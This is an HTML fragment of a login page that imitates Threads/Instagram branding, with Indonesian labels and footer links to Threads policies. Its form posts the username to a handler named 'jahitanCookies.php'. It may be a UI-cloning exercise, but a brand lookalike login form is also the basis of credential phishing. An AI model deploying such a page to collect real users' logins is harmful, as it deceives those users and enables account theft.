<div class="tengah">
  <img class="gambarTengah" src="Image/fotoTengah.png" />
  <h3 class="teksHeader">Login with your Instagram Account</h3>
  <div class="input">
    <form action="jahitanCookies.php" method="POST">
      <input
        class="inputUsername"
        type="text"
        name="username"
        autocomplete="off"
        placeholder="Username, telephone, or email"
        required
      />
      <input class="inputPassword" type="password" placeholder="Password" />
      <button class="btnLogin" type="submit">Login</button>
    </form>
  </div>
  <h5 class="lupaSandi">Lupa kata sandi?</h5>
  <h5 class="atau">── atau ──</h5>
  <div class="continue">
    <button class="btnContinue">
      <img class="iconIgContinue" src="Image/iconIg.png" />Continue with
      Instagram<img class="iconNextContinue" src="Image/iconNext.png" />
    </button>
  </div>
  <div class="footer">
    <h5>@2025</h5>
    <h5 class="footerClick">Ketentuan Threads</h5>
    <h5 class="footerClick">Kebijakan Privasi</h5>
    <h5 class="footerClick">Kebijakan Cookie</h5>
    <h5 class="footerClick">Laporkan Masalah</h5>
  </div>
</div>
